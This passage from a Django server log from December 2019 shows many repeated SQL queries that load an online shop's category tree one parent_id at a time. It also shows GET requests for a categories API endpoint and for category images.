"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 08:09:22,711 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 08:09:22,715 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 08:09:22,719 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 08:09:22,726 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 08:09:22,730 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 08:09:22,734 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 08:09:22,738 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 08:09:22,742 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 08:09:22,746 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 08:09:22,752 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 08:09:22,756 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 08:09:22,760 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 08:09:22,765 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 08:09:22,769 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 08:09:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 08:09:23] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:23] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:23] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:23] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:23] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:23] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:23] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [18/Dec/2019 08:09:23] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [18/Dec/2019 08:10:05] "GET / HTTP/1.0" 302 0 [18/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 08:16:09,840 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 08:16:09,852 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 08:16:09,857 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 08:16:09,860 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 08:16:09,865 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 08:16:09,868 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 08:16:09,871 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 08:16:09,875 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 08:16:09,878 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 08:16:09,884 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 08:16:09,888 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 08:16:09,891 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 08:16:09,895 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 08:16:09,899 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 08:16:09,904 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 08:16:09,908 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 08:16:09,911 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 08:16:09,915 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 08:16:09,920 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 08:16:09,928 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 08:16:09,933 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 08:16:09,938 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 08:16:09,942 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 08:16:09,947 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 08:16:09,951 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 08:16:09,957 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 08:16:09,961 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 08:16:09,965 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 08:16:09,969 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 08:16:09,973 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 08:16:09,978 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 08:16:09,982 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 08:16:09,986 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 08:16:09,990 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 08:16:09,994 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 08:16:10,000 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 08:16:10,003 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 08:16:10,006 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 08:16:10,008 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 08:16:10,011 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 08:16:10,013 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 08:16:10,016 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 08:16:10,018 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 08:16:10,021 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 08:16:10,024 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 08:16:10,027 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 08:16:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 08:16:10] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [18/Dec/2019 08:16:11] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-18 08:16:15,971 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 08:16:15,979 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 08:16:15,983 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 08:16:15,985 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 